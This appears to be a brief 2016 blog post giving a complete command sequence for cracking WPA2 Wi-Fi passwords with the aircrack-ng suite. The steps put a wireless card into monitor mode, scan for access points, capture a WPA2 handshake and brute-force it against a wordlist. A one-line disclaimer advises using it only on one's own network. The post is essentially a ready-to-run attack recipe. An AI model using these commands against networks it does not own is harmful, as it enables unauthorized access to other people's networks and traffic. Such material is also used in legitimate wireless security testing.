05 Aug 2016
Disclaimer: This might be illegal in some countries. Perform this attack on your own network only!
- Put WLAN device into monitoring mode:
airmon-ng start wlan0 - Scan for access points:
airodump-ng wlan0mon - Capture WPA2 handshake (use
<$BSSID>and<$CHANNEL>from the previous scan):airodump-ng -c <$CHANNEL> --bssid <$BSSID> -w <$CAPTURE_FILE> wlan0mon - Wait until airodump says ‘WPA handshake: …’ in the upper right of the terminal, then press
Ctrl+cto stop scanning. - Bruteforce the WPA2 handshake with aircrack-ng and a wordlist:
aircrack-ng <$CAPTURE_FILE>-01.cap -w <$WORDLIST_FILE>

Comments
Nothing yet. Say the first thing.
Sign in to join the conversation.